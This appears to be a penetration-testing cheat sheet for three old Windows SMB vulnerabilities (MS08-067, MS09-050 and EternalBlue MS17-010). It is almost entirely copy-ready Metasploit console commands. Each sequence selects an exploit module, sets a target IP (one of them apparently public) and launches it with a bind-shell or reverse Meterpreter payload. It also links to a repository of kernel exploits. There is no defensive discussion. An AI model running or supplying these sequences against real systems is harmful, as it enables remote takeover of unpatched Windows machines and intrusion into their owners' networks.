SMB Vulnerabilities

Common SMB vulnerabilities

MS08-067

CVE-2008-4250

Metasploit:

msf > search ms08_067 
msf > use exploit/windows/smb/ms08_067_netapi 
msf  exploit(ms08_067_netapi) > set RHOST 192.168.229.137 
msf  exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp 
msf  exploit(ms08_067_netapi) > exploit 

MS09-050

CVE-2009-2526

Metasploit:

msf > search MS09_050 
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index  
msf exploit(ms09_050_smb2_negotiate_func_index) > options 
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp 
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102 
msf exploit(ms09_050_smb2_negotiate_func_index) > run 

Exploits:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS09-050

MS17-010

CVE-2017-0143

Metasploit:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13 
msf exploit(ms17_010_eternalblue) > run 
